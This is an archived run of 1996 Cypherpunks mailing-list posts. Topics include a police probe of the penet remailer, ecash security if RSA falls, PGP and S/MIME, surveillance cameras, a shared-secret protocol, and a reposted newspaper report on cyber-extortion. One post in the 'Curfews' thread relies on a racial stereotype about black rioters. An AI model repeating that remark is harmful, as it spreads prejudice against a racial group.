<skaplin> Who posted what through penet??
<Ignatius> the hearing is scheduled for the beginning of next 
   week... perhaps already tomorrow. 
<Sherilyn> So was penet the server before lightlink in the 
   scamizdat case?
<Sherilyn> Homer gave them the name of the prior server, or was 
   going to 
*** skaplin changes topic to "Penet under attack...Again!"
<Sherilyn> Well this needs to be put out loud on groups where 
   people use penet
<skaplin> Ignatus: How good are you at translating?
<Sherilyn> Last attack on penet got the scientologists a very 
   bad rep
> Ig: We need that post.
> IN ENGLISH
> ASAP!
> even if it's a lousy translation.
<Sherilyn> This cop guy speaks English
<Sherilyn> Didn't he post in English to a.r.s.?
> Sheri: he may not want to post it on a.r.s
<Sherilyn> It's true, skap
<Ignatius> i don't know more than what I already mentioned. The 
   police officer didn't even mention Scientology; he just 
   mentioned that he was investigating a copyright offence. 
<Sherilyn> She would make a lovely domina
> sheri: you should see what I'm reading now :)
<skaplin> We're sure penet is under attack for a name though...
<Sherilyn> Bloody hell fire!
<Sherilyn> I have 6440 posts downloading!
<Ignatius> i'm writing an article to post to the ng:s, but it's 
   obvious we don't have all the bits of the puzzle yet. 
<skaplin> Want some kippers with your spam sheri?? :)
<skaplin> Ignatus: What newsgroup was it in?
> ig: please post it asap.
> also, send it to rnewman@cybercom.net.
<Ignatius> skap, sfnet.keskustelu.laki; <4os5bu$flp@idefix.eunet.fi> 
<Ignatius> the police officer, Kaj Malmberg, is at 
   kaj.malmberg@helsinki.poliisi.fi 

<end of transcript>

Deana Holmes
mirele@xmission.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 3 Jun 1996 10:05:12 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: [Off-Topic] "Curfews"
In-Reply-To: <199606020741.DAA20077@unix.asb.com>
Message-ID: <Pine.SUN.3.91.960602161127.4808B-100000@crl9.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,
	
On Sun, 2 Jun 1996, Deranged Mutant wrote:

> ....which dates back to laws that said women and children were
> mens' possessions.  Very archaic.

I've heard this claim for years.  While it may be true, I don't
recall anything in my legal training that would support it with 
respect to Anglo-American jurisprudence.  Can anyone provide a
citation (an original source, please, not some radical feminist
revisionist writings) that sheds light on this curious belief?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Mon, 3 Jun 1996 07:52:50 +0800
To: adamsc@io-online.com
Subject: Re: Ok, what about PGP (was: MD5 collisions)
Message-ID: <199606022112.RAA27954@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 30 May 96 at 1:26, Chris Adams wrote:

> How about a NSA-stomper option that would use all-of-the-above? For the truly paranoid (or 
> owners of Pentium-Pro 200Mhz multi-processor machines

Chances are that if the algorithms alone aren't "NSA-stompers", an 
all-of-the-above option won't be.

> Also, what's the verdict on IDEA? Is there a switch yet that would allow straight RSA? 
> (with the obvious speed decrease...)

That would actually be less secure. RSA may be PGP's weakest link.

Rob.
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Gabb <cea01sig@gold.ac.uk>
Date: Mon, 3 Jun 1996 02:55:38 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: I told you so
In-Reply-To: <199606011803.OAA17188@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.93.960602164556.18416A-100000@scorpio.gold.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 1 Jun 1996, Perry E. Metzger wrote:

> 
> I did NOT write what you are attributing to me. I was quoting someone else. 
> 
> Please be more careful with your attributions.
> 


Since I did not address my praise to you, I fail to see why you should
have any reason to be outraged by it.  However, let me record now for the
avoidance of ambiguity that I have never accused YOU of retracting any
falsehood.

Yours sincerely,

Sean Gabb.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gregmi@galileo.mis.net (Greg Miller)
Date: Mon, 3 Jun 1996 03:16:06 +0800
To: bart@netcom.com (Harry Bartholomew)
Subject: Re: Riding online elevators  (Was CNN: Anonymous Stock Tips)
In-Reply-To: <199606020800.BAA15224@netcom2.netcom.com>
Message-ID: <31b1c9a5.80296887@pop.mis.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 2 Jun 1996 01:00:04 -0700 (PDT), you wrote:

>    No. Seems to have gone to all cypherpunks.  I've never heard of 
>    misc.invest.stocks.

	I never got a copy.  But it sounds like to good deal to me :)


"Randomness is in the eye of the beholder" --Numerical Recipes
gregmi@mis.net (Greg Miller)
http://grendel.ius.indiana.edu/~gmiller/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 3 Jun 1996 08:23:21 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: [Off-Topic] "Curfews"
In-Reply-To: <199606021726.KAA29200@mail.pacifier.com>
Message-ID: <Pine.SV4.3.91.960602171909.881E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm more concerned about the other side of the coin.

The next time there's street riots because a jury decided to think for 
itself, will the ACLU be issuing quota guidelines that mandate that all 
black arrestees above (percentage-of-population) be given a 
"get-out-of-jail-free-for-pulling-a-bystanding-trucker-out-of-his-cab-and 
slamming-his-head-with-bricks" card?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 3 Jun 1996 09:26:23 +0800
To: cypherpunks@toad.com
Subject: Fate of Ecash if RSA is cracked?
Message-ID: <199606022242.RAA19983@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Hello,

After reading Comm. of ACM and Schneier's book about ecash,
a question arose: what if the underlying public key cryptographic
scheme gets broken somehow? Suppose, for example, that someone
discovers an ultra-fast factoring algorithm or something like that.

What would happen with all ecash that's been issued? Of course
criminals would be able to forge large amounts of authentic-looking
ecash, so banks should not be honoring requests to convert e-cash into
real cash.

I apologize in advance is this question is silly, and will appreciate your
corrections.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Mon, 3 Jun 1996 12:28:20 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: NSCP, PRZ Hit NRC Crypto Rec
Message-ID: <199606030145.SAA16749@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>   The report noted that the FBI has argued for years that its 
>   law-enforcement efforts would be hampered if drug cartels 
>   and other organized criminals began using codes that 
>   couldn't be deciphered. Courtordered wiretaps, a major tool 
>   used to break organized-crime cases, could become useless, 
>   the FBI has contended. 

I've wondered the same thing about gun control efforts. Who are they worried about? 
Criminals. By definition, what is a criminal? One who breaks the laws.  Are they seriously 
thinking that a) criminals might stop doing things because they are illegal? (For shame - I 
was going to use PGP to protect my child pornography sources. Good thing I found out it was 
illegal before I did that!) and b) criminals would not be able to buy programmers/etc to 
secure *their* privacy if they felt it was needed?
/* From Chris Adams <adamsc@io-online.com> on a Warped PC running a proudly unregistered (for now) PMMAIL 1.5!
The Enigman Group - We do Web Pages! */

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 3 Jun 1996 11:55:42 +0800
To: BASHERpunks <cypherpunks@toad.com>
Subject: Re: WSJ on "IRS-bashing"
In-Reply-To: <199606012148.OAA24297@dns1.noc.best.net>
Message-ID: <Pine.GUL.3.93.960602175255.21200B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 1 Jun 1996 jamesd@echeque.com wrote:

> At 04:01 PM 5/29/96 -0700, Rich Graves, who lives in a parallel 
> universe where political correctness is no threat to liberty, 
> and the FBI and BATF no threat to law abiding people wrote:
[...]
> But Rich Graves does not regard that sort of thing as any violation on
> freedom of speech.

One of these days I must meet this person that shares my name. I've never
seen him or her post to cypherpunks.

Duncan Frissell's message had some good points, but I get the odd sense
that he thought he was disagreeing with me.

Taken to private email again.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 3 Jun 1996 14:18:39 +0800
To: cypherpunks@toad.com
Subject: Re: opinions on book "The Truth Machine"
Message-ID: <add7a6c80002100492f6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:14 AM 6/3/96, Adam Back wrote:

>Well, we don't have curfews yet, but they're getting keen on security
>video cameras lately, the university has a few even, on top of
>buildings, the steerable variety, and with what I presume are IR spots
>mounted on them.

Today's newspaper (SJ Mercury News) carried a long article about
increasingly ubiquitous video surveillance cameras, and singled out the
U.K. as a place that is leading. Apparently even small villages have 50 or
more cameras scattered around...men have been arrested for urinating in
bushes outside pubs, caught by the infrared pickups (I hadn't thought about
the cameras being IR, but this makes sense, as a large fraction of street
crimes take place in dark or semidark areas).

The article claimed that the cameras and microphones are the latest in
surveillance technology, provided by the U.K. defense establishment.

Privacy advocates gave comments--they were predictably quite worried.

The links with crypto policy are of course apparent.

--Winston Smith


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 3 Jun 1996 14:56:28 +0800
To: cypherpunks@toad.com
Subject: "Insider Non-Trading" (Re: Insider Trading and Inside Information)
Message-ID: <add7aa1b010210045ad9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:15 PM 6/2/96, Mike Duvos wrote:

>The SEC, in cooperation with the courts, has been gradually
>shifting the definitions of "insider" and "inside information" to
>more all-encompassing ones.
...
>Nowdays "inside information" has been expanded to include
>anything that the general public is not privy to, and "insiders"
>can be almost anyone as well.
...

Indeed, the recent changes to U.S. Code 18503-666, have been dubbed the
"Insider Non-Trading Law."

What, you may ask, is "insider non-trading"?

Just as inside information may affect decisions to engage in a stock trade,
so too can insider information cause a decision _not_ to engage in a stock
trade!

Imagine that Trader Joe was planning to sell Security Dynamics short.
Perhaps with a direct short sale, or purchase of puts, or other variants.
However, he learns from his golfing partner, Jim Bidzos, that RSA Data is
about to be sold to SD for $250 million. Returning from his golf game, he
cancels his short plans. Voila, "insider non-trading."

The SEC tumbled to this some time ago, and now demands that all those who
are insiders, or who are married to insiders, or who are golfing buddies of
insiders register their trading intentions 90 days in advance of any
transaction. (This will increase to 120 days in 1997, and 180 days the
following year.)

This form of "intention escrow" ensures that insider information cannot be
used to cancel trades which were planned and then not pursued.

Key escrow, signature escrow, identity escrow, position escrow, and, now,
intention escrow. Welcome to the Escrow Society.

--Tim May

(P.S. Stu Brownstein, a Bay Area friend of mine, came up with this "insider
non-trading" joke several years ago. He once thought about writing a letter
to the "NYT" pointing out how insider trading laws must also imply insider
non-trading laws, but a Washington friend of his, he claims, told him not
to. "It may give the SEC ideas," he said.)




Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Thomlinson <mattt@microsoft.com>
Date: Mon, 3 Jun 1996 14:32:57 +0800
To: "'dlv@bwalk.dm.com>
Subject: RE: Fate of Ecash if RSA is cracked?
Message-ID: <c=US%a=_%p=msft%l=RED-77-MSG-960603034514Z-7737@tide21.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


but probably not for decent RSA key lengths -- more probably the hashing
algorithm used will fall, with much the same consequences.

mattt

>----------
>From: 	dlv@bwalk.dm.com[SMTP:dlv@bwalk.dm.com]
>Sent: 	Sunday, June 02, 1996 6:49 PM
>To: 	cypherpunks@toad.com
>Subject: 	Re: Fate of Ecash if RSA is cracked?
>
>ichudov@algebra.com (Igor Chudov @ home) writes:
>> scheme gets broken somehow? Suppose, for example, that someone
>> discovers an ultra-fast factoring algorithm or something like that.
>
>This'll happen, probably sooner than later.
>
>---
>
>Dr. Dimitri Vulis
>Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013,
>14.4Kbps
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Mon, 3 Jun 1996 15:09:54 +0800
To: John Young <jya@pipeline.com>
Subject: Re: NRC Session Hiss
In-Reply-To: <199606030150.BAA27932@pipe2.t1.usa.pipeline.com>
Message-ID: <Pine.3.89.9606022140.A1546-0100000@netcom13>
MIME-Version: 1.0
Content-Type: text/plain





On Mon, 3 Jun 1996, John Young wrote:

>    However, when pressed by later questioners on this topic, 
>    they expanded their view: that if another, stronger, 
>    program became "ubiquitous" -- in wide use -- they would 
>    support it as the standard of export. When it was pointed 
>    out that PGP now fit this definition, the panel merely 
>    repeated the statement about ubiquity without specifically 
>    affirming or denying the PGP claim. Their poker faces 
>    seemed uniformly in place to dampen a potential 
>    inflammatory topic. 

That PGP is ubiquitous is subject to discussion. PGP is widely available, 
but that doesn't mean that it is widely used. What percentage of email is 
PGP encrypted? Less than half a percent?

PGP was a failure in the mass market, regardless how popular it may be
with some subscribers of this list. The email encryption method that *will*
be ubiquitous and that will cause PGP to be used only by a relatively
small fringe is S/MIME. Within a few months, S/MIME will be on the
desktops of some 20 million people. It, not PGP is the future standard.

Of course S/MIME will default to 40 bit RC-4 and carry the signatures 
outside the encryption envelope. There is little doubt in my mind that 
the pannel will find it much easier to support than PGP.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 3 Jun 1996 12:51:40 +0800
To: cypherpunks@toad.com
Subject: Re: Fate of Ecash if RSA is cracked?
In-Reply-To: <199606022242.RAA19983@manifold.algebra.com>
Message-ID: <N9BXoD32w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


ichudov@algebra.com (Igor Chudov @ home) writes:
> scheme gets broken somehow? Suppose, for example, that someone
> discovers an ultra-fast factoring algorithm or something like that.

This'll happen, probably sooner than later.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Mon, 3 Jun 1996 13:03:30 +0800
To: Alan Horowitz <jimbell@pacifier.com>
Subject: Re: [Off-Topic] "Curfews"
Message-ID: <m0uQOnZ-000388C@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:22 PM 6/2/96 -0400, Alan Horowitz wrote:
>I'm more concerned about the other side of the coin.
>
>The next time there's street riots because a jury decided to think for 
>itself, will the ACLU be issuing quota guidelines that mandate that all 
>black arrestees above (percentage-of-population) be given a 
>"get-out-of-jail-free-for-pulling-a-bystanding-trucker-out-of-his-cab-and 
>slamming-his-head-with-bricks" card?
>
>

Cool where can I get one of those?

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Blake "Pokey" Wehlage     Gaa- 3.69
<jwilk@iglou.com>         Record- 2-4-4
Age- 13                   Final Standings- 2nd Place (Beat in Championship)
President & Founder:                   
Revolution Software       "I have the fastest glove in the east!"
Profanity Software        "Hackers never stop hacking they just get caught"
VSoft

My life- Rarely eat or sleep, Hack til' 7:00a, goto school, play goalie
til' 5:00p, hack til' 7:00a
Hank Aaron- d:-)!-<   Pope- +<:-)   Santa Claus- *<:-) The Unabrower |:-)

Current Girlfriend(s)- Lindsey Wilcox, Laura Schubring
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 3 Jun 1996 16:20:13 +0800
To: cypherpunks@toad.com
Subject: Re: opinions on book "The Truth Machine"
Message-ID: <add7c25b030210040f9c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:14 AM 6/3/96, Adam Back wrote:
>Tim May <tcmay@got.net> wrote:
>> At 11:53 AM 6/1/96, Adam Back wrote:
>> >Tim May <tcmay@got.net> wrote:
>> [...] Maybe the "make.money.fast" description was a poor one...what I meant
>> to imply is that the book is being advertised widely (I've seen half a
>> dozen announcements of it),
>
>Ah .. I misunderstood, the ad is being spammed.  We have a truly awful
>news feed which gets around 2 weeks of lag, at time of posting that
>was the only one I'd seen.

And I thought my newsfeed was bad!

Do an Alta Vista (or DejaNews, etc.) search of "The Truth Machine" and
you'll find about 300 articles on Usenet about it.

However, about 95% of them are from jhalpe@ix.netcom.com, the author of
this media event novel or from ivypress@ix.netcom.com, his vanity
publisher.

(Actually, maybe Ivy Press is not a vanity publisher. Maybe Ivy Press is
what might me dubbed a "Cantwell and Siegel publisher.")

And the groups this was posted to....mama mia! This is why I was irked that
this spam was leaking into the Cypherpunks group as well.

But no harm done, and it demonstrates another example of how the Net is
being used for such advertising. Imminent death of the Net predicted--news
at 11.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Mon, 3 Jun 1996 09:50:24 +0800
To: cypherpunks@toad.com
Subject: Class III InfoWar: TST Article
Message-ID: <199606022238.WAA16332@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


This is the article Winn Schwartau cited to last night: 
 
---------- 
 
 
   The Sunday Times (London), June 2, 1996, pp. 1, 24. 
 
 
   City surrenders to L400m gangs [Insight column] 
 
 
   City of London financial institutions have paid huge sums 
   to international gangs of sophisticated "cyber terrorists" 
   who have amassed up to L400m worldwide by threatening to 
   wipe out computer systems. 
 
   Banks, broking firms and investment houses in America have 
   also secretly paid ransom to prevent costly computer 
   meltdown and a collapse in confidence among their 
   customers, according to sources in Whitehall and 
   Washington. 
 
   An Insight investigation has established that British and 
   American agencies are examining more than 40 "attacks" on 
   financial institutions in London and New York since 1993. 
 
   Victims have paid up to L13m a time after the blackmailers 
   demonstrated their ability to bnng trading to a halt using 
   advanced "information warfare" techniques learnt from the 
   military. 
 
   According to the American National Security Agency (NSA), 
   they have penetrated computer systems using "logic bombs" 
   (coded devices that can be remotely detonated), 
   electromagnetic pulses and "high emission radio frequency 
   guns", which blow a devastating electronic "wind" through 
   a computer system. 
 
   They have also left encrypted threats at the highest 
   security levels, reading: "Now do you believe we can 
   destroy your computers?" 
 
   The authorities have been unable to stem the attacks, which 
   are thought to onginate from the United States. In most 
   cases, victim banks have failed to notify the police. "They 
   have given in to blackmail rather than risk a collapse in 
   confidence in their security systems," said a security 
   director at one blue-chip merchant bank in the City. 
 
   A senior detective in the City of London police said: "We 
   are aware of the extortion methods, but the banking 
   community has ways of dealing with it and rarely reports to 
   the police." 
 
   European and American police forces have set up special 
   units to tackle the cyber criminals, who, Ministry of 
   Defence sources believe, have netted between L200m and 
   L400m globally over the past three years. But law 
   enforcement agencies complain that senior financiers have 
   closed ranks and are hindering inquiries. 
 
   Experts in the field of information warfare met in Brussels 
   last month to discuss defensive measures. Representatives 
   included Captain Patrick Tyrrell, assistant director of 
   computer information strategy at the Ministry of Defence; 
   General James McCarthy, professor of national security at 
   the US Air Force Academy; General Jean Pichot-Duclos, 
   director of the economic intelligence department of the 
   French Defence Council, and senior figures from the 
   civilian computer industries. 
 
   A separate closed meeting involving representatives from 
   Whitehall and the intelligence community was held to 
   analyse the 40 attacks on British and American financial 
   centres since 1993. A further secret seminar took place in 
   Washington this weekend. 
 
   Kroll Associates, the international investigating firm, 
   confirmed last week that it had acted for financial 
   institutions that have been blackmailed. "One of the 
   problems we face is that the potential embarrassment from 
   loss of face is very senous," said a spokesman in New York. 
   Kroll had evidence that firms in London and New York had 
   been targeted. "The problem for law enforcement is that the 
   crime is carried out globally, but law enforcement stops at 
   the frontier," he said. 
 
   Yesterday a Bank of England spokesman acknowleged the 
   threat from the extortionists: "We are aware of this. It 
   does exist. It is extortion and fraud." But the spokesman 
   also insisted: "It is not the biggest issue in the banking 
   market." 
 
   Scotland Yard is now taking part in a Europe-wide 
   initiative to catch the cyber criminals and has appointed 
   a senior detective from its computer crime unit to take 
   part in an operation codenamed Lathe Gambit. Such is the 
   secrecy that few details about the inquiry have emerged. 
 
   In America, the FBI has set up three separate units to 
   investigate computer extortion. 
 
   The NSA believes there are four cyber gangs and has 
   evidence that at least one is based in Russia. The agency 
   is now examining four examples of blackmail said to have 
   occurred in London: 
 
   + January 6, 1993: Trading halted at a broking house after 
   blackmail threat and computer crash. Ransom of L10m paid to 
   account in Zurich. 
 
   + January 14, 1993: a blue-chip bank paid L12.5m after 
   blackmail threats. 
 
   + January 29, 1993: a broking house paid L10m in ransom 
   after similar threats. 
 
   + March 17, 1995: a defence firm paid L10m in ransom. 
 
   In all four incidents, the gangs made threats to senior 
   directors and demonstrated that they had the capacity to 
   crash a computer system. Each victim conceded to the 
   blackmailers' demands within hours and tranferred the money 
   to offshore bank accounts, from which it was removed by the 
   gangs within minutes. 
 
   The techniques have varied. In London, criminals posing as 
   marketing firms have gained detailed knowledge of a 
   target's system by interviewing the heads of information 
   technology departments. In some cases, they have even 
   issued questionnaires to unsuspecting officials. Armed with 
   this information, they have been able to breach security 
   and leave encrypted messages warning of their capability. 
 
   The gangs are believed to have gained expertise in 
   information warfare techniques from the American military, 
   which is developing "weapons" that can disable or destroy 
   computer hardware. Some are also known to have infiltrated 
   banks simply by placing saboteurs on their payroll as 
   temporary staff. 
 
   Little is yet known about the identities of the gangs but, 
   according to the NSA, America is the main source of the 
   attacks. It believes that at least one other group 
   originates from Russia and has followed the movement of 
   money to the former Soviet states. 
 
   A spokesman for the Metropoiitan poiice said: "There is 
   potential for extortion from those purporting to know how 
   to damage computer systems. 
 
   "The computer crime unit liaises where necessary with its 
   Euro counterparts to discuss cross-frontier crimes." 
 
   One merchant bank director said yesterday: "You will never 
   get a financial institution to admit it has an extortion 
   policy, let alone that it has paid money to blackmailers." 
 
   ----- 
 
   Additional reporting: Peter Warren 
 
   [End] 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an633169@anon.penet.fi
Date: Mon, 3 Jun 1996 10:12:38 +0800
To: cypherpunks@toad.com
Subject: No subject
Message-ID: <9606022252.AA01540@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


replying to ping
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: MELODYJAMES@delphi.com
Date: Mon, 3 Jun 1996 14:49:54 +0800
To: cypherpunks@toad.com
Subject: Reminder on PBS Show
Message-ID: <01I5G8VNPC768WWQT1@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


CYBER SECRETS (This week on Life on the Internet)

Law enforcement agencies say that in the wrong hands, email encryption
software called PGP (Pretty Good Privacy) threatens the public good. Check
out the online transcript, hyperlinks and live video stream of this week's
feature "Cyber Secrets" on the Life on the Internet web site.

      <http://www.pbs.org/internet/>

The program *Life on the Internet* is broadcast on Saturday mornings
in some areas.  Check your listings.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 3 Jun 1996 16:05:37 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: Fate of Ecash if RSA is cracked?
In-Reply-To: <N9BXoD32w165w@bwalk.dm.com>
Message-ID: <199606030447.XAA22063@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dr. Dimitri Vulis wrote:
> 
> ichudov@algebra.com (Igor Chudov @ home) writes:
> > scheme gets broken somehow? Suppose, for example, that someone
> > discovers an ultra-fast factoring algorithm or something like that.
> 
> This'll happen, probably sooner than later.
> 

Hm, how about using two public-key algorithms simultaneously (ie,
providing signatures made using two algorithms with each coins)?  This
way, if one algorithm gets broken, there would be supposedly enough time
to make a transition to another method or at least honor the issued ecash.

Just curious.

Another question: what happens to the ecash issued by a bank if it's
secret keys get stolen?

Thanks,

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Dierks <timd@consensus.com>
Date: Mon, 3 Jun 1996 18:46:50 +0800
To: "Deranged Mutant" <cypherpunks@toad.com
Subject: Re: The Elevator Problem
Message-ID: <v02140b01add8416384e0@[206.170.39.104]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:50 PM 6/2/96, Deranged Mutant wrote:
>Alice and Bob are in a crowded place and want to confirm they share a
>secret.
>
>Each picks a couple of random numbers, b and i.  The secret P is
>hashed i times, something like:
>
>  H_0(P) = H(P,0)               [H can be something like SHA-1...]
>  H_i(P) = H(H_i-1(P), i)
>
>They then tell each other bit b of H_i(P).
>
>This is repeated a number of times to make random guessing very
>unlikely.
>
>If all bits match, they agree that they share the secret (we assume
>neither wants to lie but discover if the other knows the secret).

It doesn't seem to me like it needs to be this complex. Here's a couple of
protocols I can think of:

For a secret S:

Alice and Bob generate and exchange random nonces. Then they calculate the
HMAC of S using the other's nonce as the MAC secret. They exchange HMACs
and each verify that their peer has correctly calculated the HMAC given the
secret and the nonce.

 - or -

Each of Alice and Bob hash S and use the result as a symmetric encryption
key; they then attempt to exchange messages. If they can exchange messages,
they must have arrived at the same key, and thus be using the same S. To
avoid replay attacks, exchange nonces and use them as a part of the key
calculation.

Note that neither of these reveals that you know S unless your peer knows
S; noone who doesn't know S can determine if Alice or Bob actually know S
or if they're using some other faked value (except for analysis of the
repercussions of the exchange).

 - Tim

Tim Dierks  --  timd@consensus.com  --  www.consensus.com
Head of Thing-u-ma-jig Engineering, Consensus Development






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 3 Jun 1996 18:31:20 +0800
To: cypherpunks@toad.com
Subject: IR Cameras
Message-ID: <199606030534.AAA13745@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sun, 2 Jun 1996 20:19:34 -0700
> From: tcmay@got.net (Timothy C. May)
> Subject: Re: opinions on book "The Truth Machine"
> 
> Today's newspaper (SJ Mercury News) carried a long article about
> increasingly ubiquitous video surveillance cameras, and singled out the
> U.K. as a place that is leading. Apparently even small villages have 50 or
> more cameras scattered around...men have been arrested for urinating in
> bushes outside pubs, caught by the infrared pickups (I hadn't thought about
> the cameras being IR, but this makes sense, as a large fraction of street
> crimes take place in dark or semidark areas).

Here in Austin, TX there is at least 1 IR camera located at the top of the
police building downtown (8th & IH-35). Many intersections have stoplight
synchronized cameras for getting license plates of red light runners (eg N.
Lamar & 51st). I know the output of the cameras is cabled off-pole (can see
the cables) to a NEMA style box. Don't know the format from there. It would
be no technological leap to buy cable channels and mux the pictures back to a
centralized site. This city is lousy with cable and fiber and the city
bought in from the get-go with a project called I-Net in the mid-80's.

                                                     Jim Choate






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 3 Jun 1996 11:45:21 +0800
To: tcmay@got.net
Subject: Re: opinions on book "The Truth Machine"
In-Reply-To: <add5bca103021004314e@[205.199.118.202]>
Message-ID: <199606030014.BAA00330@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Tim May <tcmay@got.net> wrote:
> At 11:53 AM 6/1/96, Adam Back wrote:
> >Tim May <tcmay@got.net> wrote:
> [...] Maybe the "make.money.fast" description was a poor one...what I meant
